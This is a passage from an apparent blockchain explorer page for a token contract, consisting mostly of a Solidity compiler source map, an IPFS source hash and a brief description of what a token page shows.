-;5699:63;;5655:117;5811:2;5837:53;5882:7;5873:6;5862:9;5858:22;5837:53;:::i;:::-;5827:63;;5782:118;5433:474;;;;;:::o;5913:180::-;5961:77;5958:1;5951:88;6058:4;6055:1;6048:15;6082:4;6079:1;6072:15;6099:320;6143:6;6180:1;6174:4;6170:12;6160:22;;6227:1;6221:4;6217:12;6248:18;6238:81;;6304:4;6296:6;6292:17;6282:27;;6238:81;6366:2;6358:6;6355:14;6335:18;6332:38;6329:84;;6385:18;;:::i;:::-;6329:84;6150:269;6099:320;;;:::o;6425:225::-;6565:34;6561:1;6553:6;6549:14;6542:58;6634:8;6629:2;6621:6;6617:15;6610:33;6425:225;:::o;6656:366::-;6798:3;6819:67;6883:2;6878:3;6819:67;:::i;:::-;6812:74;;6895:93;6984:3;6895:93;:::i;:::-;7013:2;7008:3;7004:12;6997:19;;6656:366;;;:::o;7028:419::-;7194:4;7232:2;7221:9;7217:18;7209:26;;7281:9;7275:4;7271:20;7267:1;7256:9;7252:17;7245:47;7309:131;7435:4;7309:131;:::i;:::-;7301:139;;7028:419;;;:::o;7453:115::-;7528:7;7557:5;7546:16;;7453:115;;;:::o;7574:60::-;7602:3;7623:5;7616:12;;7574:60;;;:::o;7640:218::-;7728:9;7761:91;7779:72;7788:62;7844:5;7788:62;:::i;:::-;7779:72;:::i;:::-;7761:91;:::i;:::-;7748:104;;7640:218;;;:::o;7864:207::-;7989:75;8058:5;7989:75;:::i;:::-;7984:3;7977:88;7864:207;;:::o;8077:298::-;8208:4;8246:2;8235:9;8231:18;8223:26;;8259:109;8365:1;8354:9;8350:17;8341:6;8259:109;:::i;:::-;8077:298;;;;:::o;8381:85::-;8426:7;8455:5;8444:16;;8381:85;;;:::o;8472:158::-;8530:9;8563:61;8581:42;8590:32;8616:5;8590:32;:::i;:::-;8581:42;:::i;:::-;8563:61;:::i;:::-;8550:74;;8472:158;;;:::o;8636:147::-;8731:45;8770:5;8731:45;:::i;:::-;8726:3;8719:58;8636:147;;:::o;8789:238::-;8890:4;8928:2;8917:9;8913:18;8905:26;;8941:79;9017:1;9006:9;9002:17;8993:6;8941:79;:::i;:::-;8789:238;;;;:::o;9033:231::-;9173:34;9169:1;9161:6;9157:14;9150:58;9242:14;9237:2;9229:6;9225:15;9218:39;9033:231;:::o;9270:366::-;9412:3;9433:67;9497:2;9492:3;9433:67;:::i;:::-;9426:74;;9509:93;9598:3;9509:93;:::i;:::-;9627:2;9622:3;9618:12;9611:19;;9270:366;;;:::o;9642:419::-;9808:4;9846:2;9835:9;9831:18;9823:26;;9895:9;9889:4;9885:20;9881:1;9870:9;9866:17;9859:47;9923:131;10049:4;9923:131;:::i;:::-;9915:139;;9642:419;;;:::o;10067:231::-;10207:34;10203:1;10195:6;10191:14;10184:58;10276:14;10271:2;10263:6;10259:15;10252:39;10067:231;:::o;10304:366::-;10446:3;10467:67;10531:2;10526:3;10467:67;:::i;:::-;10460:74;;10543:93;10632:3;10543:93;:::i;:::-;10661:2;10656:3;10652:12;10645:19;;10304:366;;;:::o;10676:419::-;10842:4;10880:2;10869:9;10865:18;10857:26;;10929:9;10923:4;10919:20;10915:1;10904:9;10900:17;10893:47;10957:131;11083:4;10957:131;:::i;:::-;10949:139;;10676:419;;;:::o;11101:229::-;11241:34;11237:1;11229:6;11225:14;11218:58;11310:12;11305:2;11297:6;11293:15;11286:37;11101:229;:::o;11336:366::-;11478:3;11499:67;11563:2;11558:3;11499:67;:::i;:::-;11492:74;;11575:93;11664:3;11575:93;:::i;:::-;11693:2;11688:3;11684:12;11677:19;;11336:366;;;:::o;11708:419::-;11874:4;11912:2;11901:9;11897:18;11889:26;;11961:9;11955:4;11951:20;11947:1;11936:9;11932:17;11925:47;11989:131;12115:4;11989:131;:::i;:::-;11981:139;;11708:419;;;:::o;12133:232::-;12273:34;12269:1;12261:6;12257:14;12250:58;12342:15;12337:2;12329:6;12325:15;12318:40;12133:232;:::o;12371:366::-;12513:3;12534:67;12598:2;12593:3;12534:67;:::i;:::-;12527:74;;12610:93;12699:3;12610:93;:::i;:::-;12728:2;12723:3;12719:12;12712:19;;12371:366;;;:::o;12743:419::-;12909:4;12947:2;12936:9;12932:18;12924:26;;12996:9;12990:4;12986:20;12982:1;12971:9;12967:17;12960:47;13024:131;13150:4;13024:131;:::i;:::-;13016:139;;12743:419;;;:::o;13168:230::-;13308:34;13304:1;13296:6;13292:14;13285:58;13377:13;13372:2;13364:6;13360:15;13353:38;13168:230;:::o;13404:366::-;13546:3;13567:67;13631:2;13626:3;13567:67;:::i;:::-;13560:74;;13643:93;13732:3;13643:93;:::i;:::-;13761:2;13756:3;13752:12;13745:19;;13404:366;;;:::o;13776:419::-;13942:4;13980:2;13969:9;13965:18;13957:26;;14029:9;14023:4;14019:20;14015:1;14004:9;14000:17;13993:47;14057:131;14183:4;14057:131;:::i;:::-;14049:139;;13776:419;;;:::o;14201:180::-;14249:77;14246:1;14239:88;14346:4;14343:1;14336:15;14370:4;14367:1;14360:15;14387:194;14427:4;14447:20;14465:1;14447:20;:::i;:::-;14442:25;;14481:20;14499:1;14481:20;:::i;:::-;14476:25;;14525:1;14522;14518:9;14510:17;;14549:1;14543:4;14540:11;14537:37;;;14554:18;;:::i;:::-;14537:37;14387:194;;;;:::o;14587:191::-;14627:3;14646:20;14664:1;14646:20;:::i;:::-;14641:25;;14680:20;14698:1;14680:20;:::i;:::-;14675:25;;14723:1;14720;14716:9;14709:16;;14744:3;14741:1;14738:10;14735:36;;;14751:18;;:::i;:::-;14735:36;14587:191;;;;:::o;14784:177::-;14924:29;14920:1;14912:6;14908:14;14901:53;14784:177;:::o;14967:366::-;15109:3;15130:67;15194:2;15189:3;15130:67;:::i;:::-;15123:74;;15206:93;15295:3;15206:93;:::i;:::-;15324:2;15319:3;15315:12;15308:19;;14967:366;;;:::o;15339:419::-;15505:4;15543:2;15532:9;15528:18;15520:26;;15592:9;15586:4;15582:20;15578:1;15567:9;15563:17;15556:47;15620:131;15746:4;15620:131;:::i;:::-;15612:139;;15339:419;;;:::o

Swarm Source

ipfs://106087dba22f46044bb1a9501f26b36782d57fbe3359af75d3b2c303f1ad834f
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.